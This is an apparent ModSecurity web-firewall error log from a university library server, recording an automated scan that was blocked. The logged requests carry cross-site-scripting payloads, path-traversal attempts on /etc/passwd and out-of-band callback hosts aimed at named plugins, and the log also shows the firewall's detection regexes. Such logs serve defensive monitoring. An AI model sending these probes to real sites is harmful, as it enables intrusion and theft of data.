[Tue Aug 29 11:57:01.667938 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAoz8WgAAAAS"]
[Tue Aug 29 11:57:02.724949 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAAq5@boAAAAK"]
[Tue Aug 29 11:57:02.842884 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nsCo-f0AAAq5@cAAAAAK"]
[Tue Aug 29 11:57:05.599058 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAm80ToAAAAF"]
[Tue Aug 29 11:57:07.655056 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AYAAAAV"]
[Tue Aug 29 11:57:07.780543 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAArB2AkAAAAV"]
[Tue Aug 29 11:57:08.574366 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq5@dkAAAAK"]
[Tue Aug 29 11:57:08.775528 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArB2BcAAAAV"]
[Tue Aug 29 11:57:11.537050 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAArbWWQAAAAG"]
[Tue Aug 29 11:57:11.894426 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16p8Co-f0AAAq5@f8AAAAK"]
[Tue Aug 29 11:57:18.713304 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAAm80YcAAAAF"]
[Tue Aug 29 11:57:18.824857 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0k5gmogjgzuaym.oast.site found within TX:1: cjmnijtjmimvgniikdb0k5gmogjgzuaym.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAAocypgAAAAR"]
[Tue Aug 29 11:57:19.598614 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16r8Co-f0AAAnEqcYAAAAO"]
[Tue Aug 29 11:57:23.741528 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAAnEqd4AAAAO"]
[Tue Aug 29 11:57:26.182831 2023] [:error] [pid 2782] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAArePKgAAAAJ"]
[Tue Aug 29 11:57:26.187008 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAm80bcAAAAF"]
[Tue Aug 29 11:57:27.560628 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAoz8gUAAAAS"]
[Tue Aug 29 11:57:30.551448 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAoz8hUAAAAS"]
[Tue Aug 29 11:57:30.576399 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArdQkEAAAAI"]
[Tue Aug 29 11:57:30.596006 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAArdQkIAAAAI"]
[Tue Aug 29 11:57:31.710531 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAArdQk0AAAAI"]
[Tue Aug 29 11:57:32.735694 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAAriwiAAAAAK"]
[Tue Aug 29 11:57:33.532600 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAArh0VoAAAAC"]
[Tue Aug 29 12:19:26.635266 2023] [:error] [pid 3236] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22James R.Hurley\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1-3sCo-f0AAAykQ6QAAAAL"]
[Tue Aug 29 12:24:13.354557 2023] [:error] [pid 3403] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Manufacturing performance\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2A-cCo-f0AAA1LpoMAAAAA"]
[Tue Aug 29 12:35:54.145866 2023] [:error] [pid 3666] [client 114.37.201.78] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "127.0.0.1_5571e9587ad71fc215f889a7d548caf7dd78551c"): Internal error [hostname "digilibft.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZO2DusCo-f0AAA5S6ZwAAAAG"]
[Tue Aug 29 12:53:19.058303 2023] [:error] [pid 3844] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Help format\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2Hz8Co-f0AAA8EAOkAAAAN"]
[Tue Aug 29 12:56:25.313805 2023] [:error] [pid 4038] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Library\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id 